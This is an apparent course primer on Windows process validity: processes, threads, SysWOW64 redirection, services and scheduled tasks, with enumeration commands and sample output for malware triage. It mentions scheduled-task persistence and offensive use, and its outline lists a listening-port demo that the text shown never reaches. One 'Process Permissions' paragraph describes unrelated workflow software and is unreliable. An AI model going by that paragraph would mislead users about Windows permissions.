Windows Process Validity Primer Guide Terminal Learning Objectives: Define what a process is and its purpose Explain the function of a thread Describe process priorities and how they are assigned Demonstrate the ability to utilize GUI and command line tools are used to view, manage and enumerate processes Perform system and user characterization using a process list Explain system processes such as idle, Session Manager Subsystem Service (SMSS) and logon Locate folders that contain x86 and x64 binaries Explain SYSWOW64 file redirection Describe key differences in operating system processes between common versions of Windows Explain parent-child relationships between processes and how this impacts the context in which a process runs Demonstrate the ability to conduct malware triage on a process list Table of Contents 1. What is a Process? 1.1 Threads/Handles 2. SysWOW64 and File System Redirector 3. Process Validity 3.1 What is Process Validity? 3.2 Why is Process Validity Important? 4. Processes, DLLs, and Services 4.1 What are they? 4.2 How to view Processes and DLLs 4.2.1 View Processes In PowerShell 4.2.2 View Processes in Command Prompt 4.2.3 View Processes in the GUI 4.3 How to View Services 4.3.1 View Services in PowerShell 4.3.2 View Services in Command Prompt 4.3.3 View Services in the GUI 5. Scheduled Tasks 5.1 What are Scheduled Tasks? 5.2 How to view Scheduled tasks 5.2.1 View Scheduled Tasks In PowerShell 5.2.2 View Scheduled Tasks In Command Prompt 5.2.3 View Scheduled Tasks in the GUI 5.2.4 Autorun Registry Locations 5.3 DEMO: Create Task to open listening Port via the PowerShell Process. 5.3.1 Create IchBinBosh task 5.3.2 Confirm IchBinBosh exists and View Properties 6. Network Connections 6.1 View Network Connections In PowerShell 6.2 View Network Connections in Command Prompt 6.3 View Network Connections in the GUI 7. Identifying Abnormalities/Suspicious Activity 7.1 Demo: Manipulating SMPhost Service and Parameters 7.2 Demo: Service configuration post-modification behavior 8. Scheduled Tasks Net Use SysInternals net use * \\live.sysinternals.com\Tools\ xcopy /s z:\ c:\sysinternals\ net use z: /d For PowerShell net use * http://live.sysinternals.com Introduction A process has the virtual address space and executable code, along with other things, in order for a program to run. All applications in the Windows Operating System consists of one or more process. We will take a look at some of the processes on a system using the GUI, command line, and PowerShell. 1. What is a Process? TLOs: 1, 2, 3 A Process is basically it’s instances of executable code running on a system, or a program that is executing, any program that is in execution. Examples include: Background tasks like spell checker Executables like Google Chrome and Notepad Process IDs (PID) When a process is created, it is assigned a PID to uniquely identify an active process. The PID for most processes is the next PID available, assigned in multiples of four. The system process is different in that its PID is constant for the variant of the OS. For example, on a modern Windows OS, the PID for the system process is always 4, regardless of how many times the system has been restarted. Yet, the PID for the IE process is different each time it is launched. The PID may be used as a parameter in various function calls, allowing processes to be manipulated, such as adjusting the process’s priority or killing it altogether. Process Priorities Process Priority is the importance that is given to each process in Windows. When your operating system is running multiple programs (or just background services) simultaneously it is actually shuffling among them. The process’s priority determines the precedence its threads have for being scheduled onto a processor, higher priority is assigned to a processor before a process with a lower priority. It also give preemptive power, taking a currently running processor from a lower priority process. There are 6 priority levels available to processes in Windows, as follows: Low/Idle Below normal Normal Above normal High Realtime Normal is the default level. Most apps start with this priority level and run without issues. The user can temporarily change process priority to speed up the app or slow it down and make it consume less resources. A new priority level applied to the app will take effect till the app’s process terminates. Once you exit it, the next time it will open with the default priority level (Normal) unless the app itself has a setting to change its priority automatically. Show how to change the process priority in Task Manager Open Task Manager → click Details Tab → right-click "Notepad" → choose "Set Priority" 1.1 Threads/Handles Threads A thread is the unit of execution within a process, the basic unit to which the Operating System allocates processor time. A process can have anywhere from just one thread to many threads. Single-threaded = one instruction, one thing happening, at a time Multi-threaded = multiple instructions, accomplishing a number of things at the same time DEMO Start notepad.exe (multi-thread process) and cmd.exe (single-thread) from command line and leave them in background #Show the multi-threads associated with notepad. Point out that the threads are sets of instructions running along with notepad PS C:\windows\system32> get-process -name notepad Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName ------- ------ ----- ----- ------ -- -- ----------- 244 13 2644 16112 0.23 328 2 notepad PS C:\windows\system32> get-process -id 328 | select-object -expandproperty threads BasePriority : 8 CurrentPriority : 10 Id : 8128 IdealProcessor : PriorityBoostEnabled : PriorityLevel : PrivilegedProcessorTime : StartAddress : 0 StartTime : ThreadState : Wait TotalProcessorTime : UserProcessorTime : WaitReason : UserRequest ProcessorAffinity : Site : Container : get-process -id 328 | Select-Object -ExpandProperty threads | select id #Show the single-thread for cmd (Note: multiple may appear but they should be in “wait” status or stopping. PS C:\windows\system32> get-process -name cmd Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName ------- ------ ----- ----- ------ -- -- ----------- 70 5 2032 3504 0.03 3984 2 cmd 76 5 2272 3800 0.02 7196 2 cmd 266 16 4944 17996 0.34 8180 2 cmd PS C:\windows\system32> (Get-Process -name cmd).threads BasePriority : 8 CurrentPriority : 9 Id : 3816 IdealProcessor : PriorityBoostEnabled : PriorityLevel : PrivilegedProcessorTime : StartAddress : 140709990605360 StartTime : ThreadState : Wait TotalProcessorTime : UserProcessorTime : WaitReason : Executive ProcessorAffinity : Site : Container : BasePriority : 8 CurrentPriority : 9 Id : 7468 IdealProcessor : PriorityBoostEnabled : PriorityLevel : PrivilegedProcessorTime : StartAddress : 140709990605360 StartTime : ThreadState : Wait TotalProcessorTime : UserProcessorTime : //==OUTPUT TRUNCATED==// Handles The object the process is interacting with on the file system. When a thread opens a file, it establishes a "handle" to the file, and internally it acts like a "name" for that instance of the file. Handles are used to link to transitory or environmental resources outside the processes memory structure. Permissions The limitations that are set for what a process can perform. Process Permissions are designed to give users or groups read-only access to cases and their objects (DynaForms, Input Documents and Output Documents). By default, only the currently designated user to work on a case can open the case. To allow other users the ability to see (but not change) the data in cases, they need to be assigned Process Permissions to the process and its objects. Process Permissions are designed to offer advanced control over how users access cases and what information they can view at specified tasks during the case. 2. SysWOW64 and File System Redirector TLOs: 7, 8 Windows 64-bits OS has a SysWOW64 folder and a System32 folder. These folders contain OS files and application DLLs. A 64-bit Windows has a system called WoW64, a Windows Operating (OS) system sub-system that runs 32-bit applications on a 64-bit OS. On 64-bit Windows, when 32-bit application attempts to access 32-bit %windir% directories, they are redirected to the SysWOW64 path. When a 32-bit application attempt to access %windir%\System32, %windir%\lastgood\system32, or %windir%\regedit.exe, the application is directed to the paths detailed in the table below: Original Path Redirected Path for 32-bit (x86) Processes %windir%\System32 %windir%\SysWOW64 %windir%\lastgood\system32 %windir%\lastgood\SysWOW64 %windir%\regedit.exe %windir%\SysWOW64\regedit.exe There are known vulnerabilities using classic stack overflows with memory corruption exploits, which focus on a 32-bit stack overflows running under Wow64. More can be explained at the following link: Windows Memory Corruption Exploits 3. Process Validity 3.1 What is Process Validity? Being able to distinguish a Process as a known good from a possible bad from its attributes and characteristics. Whether that be something simple as it’s name and hash or we go more in depth to it’s threads and handles. Today’s Malware typically use their stealth and obfuscation abilities in order to hide in various artifacts such as: processes files registry keys drivers etc. They try to leave as little evidence of their presence as possible by mimicking or by hooking onto legitimate processes or services. 3.2 Why is Process Validity Important? OCO - Offensive Operations We need to protect our toolset (malware we’ve created). Find any other types of malware on the box that could compromise our tools. DCO - Defensive Operations Find malware and defend our networks Make sure we are not compromised or have sensitive information stolen from us. Could be the difference between life and death for soldiers on mission. 4. Processes, DLLs, and Services 4.1 What are they? What is a Process? A program running on your computer, whether executed by the user or running in the background. Examples include: Background tasks like spell checker Executables like Google Chrome and Notepad What is a DLL? Dynamic Link Library A non-standalone program that can be run by (linked to) multiple programs at the same time. Cannot be directly executed. Dependent on an exe to use as an entry point, such as RUNDLL.EXE (a process that calls on the functionality of the DLL) Allows developers to make minor changes without affecting other parts of the program. Some Examples Include: Comdlg32 - Performs common dialog box related functions. Device drivers ActiveX Controls If you want to dig deeper: Ask Microsoft What is a Service? Windows Services are a core component of the Microsoft Windows operating system that start when the computer is booted and run in the background. Windows Services can start without user intervention and may continue to run long after the user has logged off. Developers can create Services by creating applications that are installed as a Service. Long-running executables that run in their own Windows sessions (i.e. in the background) Can be set to auto start when the computer boots or a user logs on. Can be paused and restarted. Do not require user interaction or show any user interface. Can be use to handle low-level tasks If you want to dig deeper: Ask Microsoft 4.2 How to view Processes and DLLs Q: Which Windows commands let us view processes? PowerShell: Get-Process - Microsoft Reference CMD: tasklist 4.2.1 View Processes In PowerShell View all Processes, not sorted. Get-Process PS C:\Users\student> Get-Process Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName ------- ------ ----- ----- ------ -- -- ----------- 278 18 9420 18984 3.61 6304 1 ApplicationFrameHost 342 19 4516 3988 4624 0 armsvc 958 57 127900 202620 51.38 632 1 atom 572 82 182356 266836 117.64 3148 1 atom 321 33 92760 164644 0.56 7864 1 atom 222 15 6884 28916 0.03 8024 1 atom 733 27 143268 172480 38.33 13980 1 atom 68 5 2040 4128 0.02 7504 1 cmd //==OUTPUT TRUNCATED==// View all Processes, sort them by PID. Get-Process | Sort -Property Id | more PS C:\Users\student> Get-Process | Sort -Property Id | more Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName ------- ------ ----- ----- ------ -- -- ----------- 0 0 60 8 0 0 Idle 4240 0 192 96 4 0 System 0 0 184 22332 72 0 Secure System 0 17 6552 28656 132 0 Registry 168 11 1432 3484 452 0 wininit 53 3 1056 940 504 0 smss //==OUTPUT TRUNCATED==// View all processes, but sort by PID and only show the properties I define. Get-Process | Select Name, Id, Description | Sort -Property Id | more PS C:\Users\student> Get-Process | Select Name, Id, Description | Sort -Property Id | more Name Id Description ---- -- ----------- Idle 0 System 4 Secure System 72 Registry 132 wininit 452 smss 504 LsaIso 572 csrss 576 svchost 624 atom 632 Atom svchost 852 rundll32 1616 Windows host process (Rundll32) CompPkgSrv 1788 Component Package Support Server Slack 1816 Slack //==OUTPUT TRUNCATED==// View only the processes I define and sort by PID Get-Process SMSS,CSRSS,LSASS | Sort -Property Id PS C:\Users\student> Get-Process SMSS,CSRSS,LSASS | Sort -Property Id Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName ------- ------ ----- ----- ------ -- -- ----------- 53 3 1056 940 504 0 smss 717 33 3684 3688 576 1 csrss 784 24 1928 2788 876 0 csrss 1612 39 10352 18076 1028 0 lsass View modules/DLLs used by defined process and their file locations. Get-Process chrome | foreach {$a} {$_.modules} | more Get-Process -Name "*chrome*" | Select-Object -ExpandProperty Modules | more PS C:\Users\student> Get-Process chrome | foreach {$a} {$_.modules} | more Size(K) ModuleName FileName ------- ---------- -------- 2244 chrome.exe C:\Program Files (x86)\Google\Chrome\Application\chrome.exe 2008 ntdll.dll C:\WINDOWS\SYSTEM32\ntdll.dll 756 KERNEL32.DLL C:\WINDOWS\System32\KERNEL32.DLL 2852 KERNELBASE.dll C:\WINDOWS\System32\KERNELBASE.dll 1016 chrome_elf.dll C:\Program Files (x86)\Google\Chrome\Application\88.0.4324... 40 VERSION.dll C:\WINDOWS\SYSTEM32\VERSION.dll //==OUTPUT TRUNCATED==// View only modules/DLLs used by Chrome with "chrome" in the name and their file locations. Get-Process chrome | foreach {$a} {$_.modules} | Where-Object ModuleName -like '*chrome*' | more Get-Process -Name "*chrome*" | Select-Object -ExpandProperty Modules | Where-Object ModuleName -like '*chrome*' | more Pipe in a ft -wrap to see full file name/path. PS C:\Users\student> Get-Process chrome | foreach {$a} {$_.modules} | Where-Object ModuleName -like '\*chrome*' | more Size(K) ModuleName FileName ------- ---------- -------- 2244 chrome.exe C:\Program Files (x86)\Google\Chrome\Application\chrome.exe 1016 chrome_elf.dll C:\Program Files (x86)\Google\Chrome\Application\88.0.4324... 2244 chrome.exe C:\Program Files (x86)\Google\Chrome\Application\chrome.exe 1016 chrome_elf.dll C:\Program Files (x86)\Google\Chrome\Application\88.0.4324... 152776 chrome.dll C:\Program Files (x86)\Google\Chrome\Application\88.0.4324... //==OUTPUT TRUNCATED==// View an instance of all Win32 (system) services. Get-Ciminstance Win32_service | Select Name, Processid, Pathname | more Pipe in ft -wrap to see full file name/path PS C:\Users\student> Get-Ciminstance Win32_service | Select Name, Processid, Pathname | ft -wrap | more Name Processid Pathname ---- --------- -------- AdobeARMservice 4624 "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe" AJRouter 0 C:\WINDOWS\system32\svchost.exe -k LocalServiceNetworkRestricted -p ALG 0 C:\WINDOWS\System32\alg.exe AppIDSvc 0 C:\WINDOWS\system32\svchost.exe -k LocalServiceNetworkRestricted -p Appinfo 7752 C:\WINDOWS\system32\svchost.exe -k netsvcs -p AppReadiness 0 C:\WINDOWS\System32\svchost.exe -k AppReadiness -p AppXSvc 13292 C:\WINDOWS\system32\svchost.exe -k wsappx -p AudioEndpointBuilder 3168 C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted -p Audiosrv 3920 C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted -p autotimesvc 0 C:\WINDOWS\system32\svchost.exe -k autoTimeSvc AxInstSV 0 C:\WINDOWS\system32\svchost.exe -k AxInstSVGroup BDESVC 1628 C:\WINDOWS\System32\svchost.exe -k netsvcs -p BFE 3908 C:\WINDOWS\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p BITS 0 C:\WINDOWS\System32\svchost.exe -k netsvcs -p BrokerInfrastructure 1172 C:\WINDOWS\system32\svchost.exe -k DcomLaunch -p //==OUTPUT TRUNCATED==// 4.2.2 View Processes in Command Prompt View all processes tasklist C:\Users\student> tasklist | more Image Name PID Session Name Session# Mem Usage ========================= ======== ================ =========== ============ System Idle Process 0 Services 0 8 K System 4 Services 0 96 K Secure System 72 Services 0 22,332 K Registry 132 Services 0 28,948 K smss.exe 504 Services 0 940 K csrss.exe 876 Services 0 2,800 K wininit.exe 452 Services 0 3,484 K csrss.exe 576 Console 1 3,648 K winlogon.exe 916 Console 1 6,204 K services.exe 976 Services 0 6,996 K -- More -- Display verbose task information in the output tasklist /v C:\Users\student> tasklist /v | more svchost.exe 3012 Services 0 5,364 K Unknown N/A Image Name PID Session Name Session# Mem Usage Status User Name CPU Time Window TitleHandles or DLLs a process is using ========================= ======== ================ =========== ============ =============== ======================== =============================== System Idle Process 0 Services 0 8 K Unknown NT AUTHORITY\SYSTEM 1628:26:24 N/A System 4 Services 0 96 K Unknown N/A 0:44:21 N/A Secure System 72 Services 0 22,332 K Unknown N/A 0:00:00 N/A Registry 132 Services 0 37,948 K Unknown N/A 0:00:12 N/A smss.exe 504 Services 0 940 K Unknown N/A 0:00:00 N/A csrss.exe 876 Services 0 2,908 K Unknown N/A 0:00:06 N/A wininit.exe 452 Services 0 3,488 K Unknown N/A 0:00:00 N/A -- More -- Display service information for each process without truncation tasklist /svc C:\Users\student> tasklist /svc Image Name PID Services ========================= ======== ============================================ System Idle Process 0 N/A System 4 N/A Secure System 72 N/A Registry 132 N/A smss.exe 504 N/A csrss.exe 876 N/A wininit.exe 452 N/A csrss.exe 576 N/A winlogon.exe 916 N/A services.exe 976 N/A LsaIso.exe 572 N/A lsass.exe 1028 EFS, KeyIso, SamSs, VaultSvc svchost.exe 1172 BrokerInfrastructure, DcomLaunch, PlugPlay, Power, SystemEventsBroker //==OUTPUT TRUNCATED==// Handles or DLLs a process is using Display modules/dlls associated to all processes. tasklist /m | more C:\Users\student> tasklist /m | more Image Name PID Modules ========================= ======== ============================================ System Idle Process 0 N/A System 4 N/A Secure System 72 N/A Registry 132 N/A smss.exe 504 N/A csrss.exe 876 N/A wininit.exe 452 N/A csrss.exe 576 N/A winlogon.exe 916 N/A services.exe 976 N/A LsaIso.exe 572 N/A lsass.exe 1028 N/A svchost.exe 1160 N/A sihost.exe 4720 ntdll.dll, KERNEL32.DLL, KERNELBASE.dll, msvcp_win.dll, ucrtbase.dll, combase.dll, RPCRT4.dll, sechost.dll, advapi32.dll, msvcrt.dll, CoreMessaging.dll, WS2_32.dll, ntmarta.dll, kernel.appcore.dll, -- More -- Handles or DLLs a process is using Display modules/dlls associated to a specific process. tasklist /m /fi "IMAGENAME eq chrome.exe" C:\Users\student> tasklist /m /fi "IMAGENAME eq chrome.exe" | more Image Name PID Modules ========================= ======== ============================================ chrome.exe 8260 ntdll.dll, KERNEL32.DLL, KERNELBASE.dll, chrome_elf.dll, VERSION.dll, msvcrt.dll, ADVAPI32.dll, sechost.dll, RPCRT4.dll, CRYPTBASE.DLL, bcryptPrimitives.dll, ntmarta.dll, ucrtbase.dll, user32.dll, win32u.dll, GDI32.dll, gdi32full.dll, msvcp_win.dll, IMM32.DLL, SHELL32.dll, windows.storage.dll, combase.dll, Wldp.dll, SHCORE.dll, shlwapi.dll, chrome.dll, -- More -- Formating options tasklist /fo:{table|list|csv}` C:\Users\student> tasklist /fo:table | more Image Name PID Session Name Session# Mem Usage ========================= ======== ================ =========== ============ System Idle Process 0 Services 0 8 K System 4 Services 0 96 K Secure System 72 Services 0 22,332 K Registry 132 Services 0 37,876 K smss.exe 504 Services 0 964 K csrss.exe 876 Services 0 2,940 K wininit.exe 452 Services 0 3,712 K -- More -- C:\Users\student> tasklist /fo:list | more Image Name: System Idle Process PID: 0 Session Name: Services Session#: 0 Mem Usage: 8 K Image Name: System PID: 4 Session Name: Services Session#: 0 Mem Usage: 96 K Image Name: Secure System PID: 72 Session Name: Services Session#: 0 Mem Usage: 22,332 K -- More -- C:\Users\student> tasklist /fo:csv | more "Image Name","PID","Session Name","Session#","Mem Usage" "System Idle Process","0","Services","0","8 K" "System","4","Services","0","96 K" "Secure System","72","Services","0","22,332 K" "Registry","132","Services","0","37,876 K" "smss.exe","504","Services","0","964 K" "csrss.exe","876","Services","0","2,940 K" "wininit.exe","452","Services","0","3,712 K" "csrss.exe","576","Console","1","4,948 K" "winlogon.exe","916","Console","1","6,600 K" "services.exe","976","Services","0","7,636 K" -- More -- Filtering for specific string/process tasklist /fi "IMAGENAME eq lsass.exe" C:\Users\student>tasklist /fi "IMAGENAME eq lsass.exe Image Name PID Session Name Session# Mem Usage ========================= ======== ================ =========== ============ lsass.exe 1028 Services 0 17,984 K 4.2.3 View Processes in the GUI Task Manager Microsoft Default Real-time monitoring of processes and services. Open Notepad and put in background View Processes → Expand an "App" to view the instances running → right-click → select "Bring to front" → you can also choose to "End task" + Procexp.exe Sysinternal Tools Microsoft Reference 4.3 How to View Services Windows Services Control Manager (SCM) Services are managed through the Services Control Manager, which shows a list of services' name, description, status and type. You can change the status (Stop, Pause, Start, Delay Start or Resume) and modify the start mechanism (Manual or Automatic) of all services using SCM. Windows Services can mostly be categorized into three categories depending on teh actions and applications they are associated with: Local Services, Network Services and System Services. System Services are those that start when the computer is booted and run in the background without user interaction. System Process Description idle Though not a real process, its purpose is to count the number of cycles where the processor(s) are not doing anything. system This process represents the kernel process (ntoskrnl.exe). smss The Session Manager Subsystem Service, or the smss.exe process, creates and manages the various sessions on the system as well as finalizing system initialization and starting wininit.exe and winlogon.exe. csrss The user-mode portion of the Windows Subsystem. wininit The wininit.exe is a Session Zero (0) initialization process. This process runs in session 0 (OS’s session) only. It starts any auto-start devices and drivers applicable to Session 0 and launches lsass.exe. winlogon This is the Interactive Logon Manager. An instance of it runs in all sessions above zero (0). Its purpose is to coordinate all logon activities and security-related functions within its session, and to launch services.exe. services The Service Control Manager (SCM) is responsible for starting all auto-start devices and drivers applicable to its session. lsass The Local Security Authority Subsystem Service, or lssas. exe process, runs in Session 0. It performs all logon functions to include user authentication, verifying the user’s access, and creating the user’s access token. lsm The Local Session Manager, or the lsm.exe process, also runs in Session 0. Its purpose is to manage all connections related to terminal server and monitor all other sessions. If it detects an unstable state in any of the system’s sessions above Session 0, it signals the SMSS to terminate the session. Multiple iterations of Processes that should only have a set number or a single process are indicators of abnormal behavior if they have extra. One LSASS, one SMSS, and at least 2 CSRSS are great examples. SI = Session Identifier, System level process should have 0 and 2nd CSRSS (and more) will have 1, 2, etc. For Example PS C:\windows\system32> Get-Process SMSS,CSRSS,LSASS | Sort -Property Id Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName ------- ------ ----- ----- ------ -- -- ----------- 56 3 492 376 308 0 smss 509 19 1656 1548 428 0 csrss 168 9 1560 1332 512 1 csrss 1353 23 6780 10536 660 0 lsass 437 19 1688 2240 5000 2 csrss Table 1. The above output explained by column Column Defined Handles The number of handles that the process has opened, objects the process is interacting with on the file system NPM(K) The amount of non-paged memory that the process is using, in kilobytes PM(K) The amount of pageable memory that the process is using, in kilobytes WS(K) The size of the working set of the process, in kilobytes. The working set consists of the pages of memory that were recently referenced by the process VM(M) The amount of virtual memory that the process is using, in megabytes. Virtual memory includes storage in the paging files on disk CPU(s) The amount of processor time that the process has used on all processors, in seconds ID The process ID (PID) of the process SI Session Identifier ProcessName The name of the process Tools to view information on services In Powershell: Get-Ciminstance - Microsoft Reference Get-Service - Microsoft Reference In Command Prompt: net start - Shows currently running services sc query - Microsoft Reference 4.3.1 View Services in PowerShell View only system services and display Name, PID, and the path they are initiated from. Get-Ciminstance Win32_service | Select Name, Processid, Pathname | more Pipe in a ft -wrap to see full pathname. PS C:\Users\student> Get-Ciminstance Win32_service | Select Name, Processid, Pathname | more Name Processid Pathname ---- --------- -------- AdobeARMservice 4624 "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe" AJRouter 0 C:\WINDOWS\system32\svchost.exe -k LocalServiceNetworkRestri... ALG 0 C:\WINDOWS\System32\alg.exe AppIDSvc 0 C:\WINDOWS\system32\svchost.exe -k LocalServiceNetworkRestri... Appinfo 7752 C:\WINDOWS\system32\svchost.exe -k netsvcs -p AppReadiness 0 C:\WINDOWS\System32\svchost.exe -k AppReadiness -p AppXSvc 0 C:\WINDOWS\system32\svchost.exe -k wsappx -p AudioEndpointBuilder 3168 C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestric... Audiosrv 3920 C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestri... -- More -- You can pull the Description of a Service with Get-Ciminstance but not with Get-Service PS C:\windows\system32> Get-Ciminstance Win32_service | Select Name,Description Name Description ---- ----------- AJRouter Routes AllJoyn messages for the local AllJoyn client... ALG Provides support for 3rd party protocol plug-ins for... AppIDSvc Determines and verifies the identity of an applicati... Appinfo Facilitates the running of interactive applications ... AppMgmt Processes installation, removal, and enumeration req... AppReadiness Gets apps ready for use the first time a user signs ... AppVClient Manages App-V users and virtual applications AppXSvc Provides infrastructure support for deploying Store ... AssignedAccessManagerSvc AssignedAccessManager Service supports kiosk experie... AudioEndpointBuilder Manages audio devices for the Windows Audio service.... Audiosrv Manages audio for Windows-based programs. If this s... View all services. Get-service PS C:\Users\student> get-service | more Status Name DisplayName ------ ---- ----------- Stopped AarSvc_5d854 Agent Activation Runtime_5d854 Running AdobeARMservice Adobe Acrobat Update Service Stopped AJRouter AllJoyn Router Service Stopped ALG Application Layer Gateway Service Stopped AppIDSvc Application Identity -- More -- View a defined service, showing all properties in list format. get-service ALG | format-list * PS C:\Users\student> get-service ALG | format-list * Name : ALG RequiredServices : {} CanPauseAndContinue : False CanShutdown : False CanStop : False DisplayName : Application Layer Gateway Service DependentServices : {} MachineName : . ServiceName : ALG ServicesDependedOn : {} ServiceHandle : Status : Stopped ServiceType : Win32OwnProcess StartType : Manual Site : Container : View only currently running services. Get-Service | Where-Object {$_.Status -eq "Running"} PS C:\Users\student> Get-Service | Where-Object {$_.Status -eq "Running"} | more Status Name DisplayName ------ ---- ----------- Running AdobeARMservice Adobe Acrobat Update Service Running Appinfo Application Information Running AppXSvc AppX Deployment Service (AppXSVC) Running AudioEndpointBu... Windows Audio Endpoint Builder Running Audiosrv Windows Audio Running BDESVC BitLocker Drive Encryption Service Running BFE Base Filtering Engine -- More -- 4.3.2 View Services in Command Prompt View Services sc query Examples of the SC command C:\sc /? # Basic service enumeration C:\sc qc # Configuration information for a service C:\sc queryex eventlog # Information for the eventlog service including pid C:\sc qdescription eventlog # Query eventlog service description C:\sc qc eventlog # Show the binary command that loads the service C:\sc showsid eventlog # Displays the service SID and status c:\sc enmudepend # Lists the services that cannot run unless the specified service is running sc query C:\Users\student>sc query | more SERVICE_NAME: AdobeARMservice DISPLAY_NAME: Adobe Acrobat Update Service TYPE : 10 WIN32_OWN_PROCESS STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0 SERVICE_NAME: Appinfo DISPLAY_NAME: Application Information -- More -- .Query the configuration information for netlogon service C:\windows\system32>sc qc netlogon [SC] QueryServiceConfig SUCCESS SERVICE_NAME: netlogon TYPE : 20 WIN32_SHARE_PROCESS START_TYPE : 3 DEMAND_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\windows\system32\lsass.exe LOAD_ORDER_GROUP : MS_WindowsRemoteValidation TAG : 0 DISPLAY_NAME : Netlogon DEPENDENCIES : LanmanWorkstation SERVICE_START_NAME : LocalSystem View extended information for all services C:\Users\student>sc queryex type=service | more SERVICE_NAME: AdobeARMservice DISPLAY_NAME: Adobe Acrobat Update Service TYPE : 10 WIN32_OWN_PROCESS STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0 PID : 4624 FLAGS : SERVICE_NAME: Appinfo DISPLAY_NAME: Application Information -- More -- View extended information for all inactive services. C:\Users\student>sc queryex type=service state=inactive | more SERVICE_NAME: AJRouter DISPLAY_NAME: AllJoyn Router Service TYPE : 20 WIN32_SHARE_PROCESS STATE : 1 STOPPED WIN32_EXIT_CODE : 1077 (0x435) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0 PID : 0 FLAGS : SERVICE_NAME: ALG DISPLAY_NAME: Application Layer Gateway Service TYPE : 10 WIN32_OWN_PROCESS -- More -- Query for information for the eventlog service including pid C:\windows\system32>sc queryex eventlog SERVICE_NAME: eventlog TYPE : 30 WIN32 STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0 PID : 1296 FLAGS : Use Tasklist to find out what process kicked off the eventlog service C:\windows\system32>tasklist /FI "pid eq 1296" /v Image Name PID Session Name Session# Mem Usage Status User Name CPU Time Window Title =========== ==== ============ ======== ========= ======= ========================== ======== ============ svchost.exe 1296 Services 0 12,468 K Unknown NT Authority\Local Service 0:00:02 N/A Query eventlog service description C:\windows\system32>sc qdescription eventlog [SC] QueryServiceConfig2 SUCCESS SERVICE_NAME: eventlog DESCRIPTION: This service manages events and event logs. It supports logging events, querying events, subscribing to events, archiving event logs, and managing event metadata. It can display events in both XML and plain text format. Stopping this service may compromise security and reliability of the system. Show the binary command that loads the eventlog service C:\windows\system32>sc qc eventlog [SC] QueryServiceConfig SUCCESS SERVICE_NAME: eventlog TYPE : 20 WIN32_SHARE_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p LOAD_ORDER_GROUP : Event Log TAG : 0 DISPLAY_NAME : Windows Event Log DEPENDENCIES : SERVICE_START_NAME : NT AUTHORITY\LocalService Displays the service SID and status C:\windows\system32>sc showsid eventlog NAME: eventlog SERVICE SID: S-1-5-80-880578595-1860270145-482643319-2788375705-1540778122 STATUS: Active Security Identifiers (SID) (also referred to as service security principal (SID)) to allow permissions to be granted directly to a specific service Lists the services that cannot run unless the specified service is running C:\windows\system32>sc enumdepend eventlog [SC] EnumDependentServices: entriesread = 4 SERVICE_NAME: Wecsvc DISPLAY_NAME: Windows Event Collector TYPE : 20 WIN32_SHARE_PROCESS STATE : 1 STOPPED WIN32_EXIT_CODE : 1077 (0x435) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0 SERVICE_NAME: NcdAutoSetup DISPLAY_NAME: Network Connected Devices Auto-Setup TYPE : 30 WIN32 STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) //==OUTPUT TRUNCATED==// View all currently running services using net start C:\Users\student>net start | more These Windows services are started: Adobe Acrobat Update Service Application Information AppX Deployment Service (AppXSVC) AVCTP service Background Tasks Infrastructure Service Base Filtering Engine -- More -- The net start command is used to start a network service or list running network services. 4.3.3 View Services in the GUI services.msc Pull it up in the Windows search bar or run in cmd "services.msc" PsService Sysinternal Tool Microsoft Reference 5. Scheduled Tasks 5.1 What are Scheduled Tasks? Schedule the launch of programs or scripts when defined conditions are met, such as: Pre-set time (ex. 0900 on Sundays) When the local machine boots up. When a user logs on. Easy way to hide Malware and have itself set to execute at set times. Separate files can be run from schedule tasks that calls the malware, like a script Good way to establish Persistence. 5.2 How to view Scheduled tasks Task Scheduler is a job scheduler in Microsoft Windows that launches computer programs or scripts at pre-defined times or after specified time intervals. 5.2.1 View Scheduled Tasks In PowerShell View all properties of the first scheduled task. Get-ScheduledTask | Select * | select -First 1 PS C:\Users\student> Get-ScheduledTask | Select * | select -First 1 State : Ready Actions : {MSFT_TaskExecAction} Author : Adobe Systems Incorporated Date : Description : This task keeps your Adobe Reader and Acrobat applications up to date with the latest enhancements and security fixes Documentation : Principal : MSFT_TaskPrincipal2 SecurityDescriptor : Settings : MSFT_TaskSettings3 Source : TaskName : Adobe Acrobat Update Task TaskPath : \ Triggers : {MSFT_TaskLogonTrigger, MSFT_TaskDailyTrigger} URI : \Adobe Acrobat Update Task Version : PSComputerName : CimClass : Root/Microsoft/Windows/TaskScheduler:MSFT_ScheduledTask CimInstanceProperties : {Actions, Author, Date, Description...} CimSystemProperties : 